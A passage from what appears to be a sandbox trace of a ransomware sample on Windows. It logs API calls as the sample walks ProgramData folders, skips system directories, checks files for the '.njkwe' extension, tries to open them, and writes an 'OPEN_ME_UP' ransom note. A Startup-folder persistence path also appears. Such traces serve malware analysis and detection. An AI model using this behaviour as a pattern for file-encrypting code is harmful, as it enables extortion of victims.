Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.879] GetProcessHeap () returned 0xbe0000 [0072.879] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.879] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned 87 [0072.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd5f4a5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0072.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.881] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.881] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.881] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.881] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\.") returned 87 [0072.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.881] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd5f4a5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.881] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.881] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.881] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.881] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.882] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\..") returned 88 [0072.882] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.882] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.882] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b27bb25, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbd5f5c36, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-US", cAlternateFileName="")) returned 1 [0072.882] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0072.882] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0072.882] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0072.882] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0072.882] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0072.882] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0072.882] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0072.882] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0072.882] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.882] GetProcessHeap () returned 0xbe0000 [0072.882] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0072.882] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned 93 [0072.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b27bb25, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbd5f5c36, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d20 [0072.882] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.882] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.882] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.882] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.882] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.882] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\.") returned 93 [0072.882] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.882] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b27bb25, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbd5f5c36, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.882] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.882] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.882] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.882] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.882] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.882] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\..") returned 94 [0072.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.883] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3de910b4, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x755f99d9, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x11db3100, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0072.883] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0072.883] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0072.883] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0072.883] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0072.883] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0072.883] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 104 [0072.883] StrStrIW (lpFirst="resource.xml", lpSrch=".njkwe") returned 0x0 [0072.883] lstrcmpW (lpString1="resource.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.883] lstrcmpW (lpString1="resource.xml", lpString2="taridd") returned -1 [0072.883] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.883] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.030] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3de910b4, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x755f99d9, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x11db3100, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0073.030] FindClose (in: hFindFile=0xc19d20 | out: hFindFile=0xc19d20) returned 1 [0073.030] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 123 [0073.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0073.031] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0073.032] CloseHandle (hObject=0x438) returned 1 [0073.032] GetProcessHeap () returned 0xbe0000 [0073.032] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0073.032] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49316445, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x49316445, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x49316445, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0073.033] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0073.033] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0073.033] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0073.033] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0073.033] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0073.033] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96 [0073.033] StrStrIW (lpFirst="folder.ico", lpSrch=".njkwe") returned 0x0 [0073.033] lstrcmpW (lpString1="folder.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.033] lstrcmpW (lpString1="folder.ico", lpString2="taridd") returned -1 [0073.033] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.033] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.034] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49316445, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x49316445, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0073.034] lstrcmpiW (lpString1="netfol.ico", lpString2="Windows") returned -1 [0073.034] lstrcmpiW (lpString1="netfol.ico", lpString2="$Recycle.bin") returned 1 [0073.034] lstrcmpiW (lpString1="netfol.ico", lpString2="System Volume Information") returned -1 [0073.034] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files") returned -1 [0073.034] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files (x86)") returned -1 [0073.034] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96 [0073.034] StrStrIW (lpFirst="netfol.ico", lpSrch=".njkwe") returned 0x0 [0073.034] lstrcmpW (lpString1="netfol.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.034] lstrcmpW (lpString1="netfol.ico", lpString2="taridd") returned -1 [0073.035] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.035] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.035] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0073.036] lstrcmpiW (lpString1="pictures.ico", lpString2="Windows") returned -1 [0073.036] lstrcmpiW (lpString1="pictures.ico", lpString2="$Recycle.bin") returned 1 [0073.036] lstrcmpiW (lpString1="pictures.ico", lpString2="System Volume Information") returned -1 [0073.036] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files") returned -1 [0073.036] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files (x86)") returned -1 [0073.036] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98 [0073.036] StrStrIW (lpFirst="pictures.ico", lpSrch=".njkwe") returned 0x0 [0073.036] lstrcmpW (lpString1="pictures.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.036] lstrcmpW (lpString1="pictures.ico", lpString2="taridd") returned -1 [0073.036] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.036] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.036] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49362917, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x49362917, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x49362917, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0073.036] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0073.036] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0073.036] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0073.036] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0073.036] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0073.036] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98 [0073.036] StrStrIW (lpFirst="resource.xml", lpSrch=".njkwe") returned 0x0 [0073.036] lstrcmpW (lpString1="resource.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.036] lstrcmpW (lpString1="resource.xml", lpString2="taridd") returned -1 [0073.036] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.036] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.036] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0073.036] lstrcmpiW (lpString1="ringtones.ico", lpString2="Windows") returned -1 [0073.036] lstrcmpiW (lpString1="ringtones.ico", lpString2="$Recycle.bin") returned 1 [0073.036] lstrcmpiW (lpString1="ringtones.ico", lpString2="System Volume Information") returned -1 [0073.036] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files") returned 1 [0073.037] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files (x86)") returned 1 [0073.037] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99 [0073.037] StrStrIW (lpFirst="ringtones.ico", lpSrch=".njkwe") returned 0x0 [0073.037] lstrcmpW (lpString1="ringtones.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.037] lstrcmpW (lpString1="ringtones.ico", lpString2="taridd") returned -1 [0073.037] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.037] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.037] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0073.037] lstrcmpiW (lpString1="settings.ico", lpString2="Windows") returned -1 [0073.037] lstrcmpiW (lpString1="settings.ico", lpString2="$Recycle.bin") returned 1 [0073.037] lstrcmpiW (lpString1="settings.ico", lpString2="System Volume Information") returned -1 [0073.037] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files") returned 1 [0073.037] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files (x86)") returned 1 [0073.038] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98 [0073.038] StrStrIW (lpFirst="settings.ico", lpSrch=".njkwe") returned 0x0 [0073.038] lstrcmpW (lpString1="settings.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.038] lstrcmpW (lpString1="settings.ico", lpString2="taridd") returned -1 [0073.038] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.038] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0073.038] lstrcmpiW (lpString1="sync.ico", lpString2="Windows") returned -1 [0073.038] lstrcmpiW (lpString1="sync.ico", lpString2="$Recycle.bin") returned 1 [0073.038] lstrcmpiW (lpString1="sync.ico", lpString2="System Volume Information") returned -1 [0073.038] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files") returned 1 [0073.038] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files (x86)") returned 1 [0073.038] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94 [0073.038] StrStrIW (lpFirst="sync.ico", lpSrch=".njkwe") returned 0x0 [0073.038] lstrcmpW (lpString1="sync.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.038] lstrcmpW (lpString1="sync.ico", lpString2="taridd") returned -1 [0073.038] 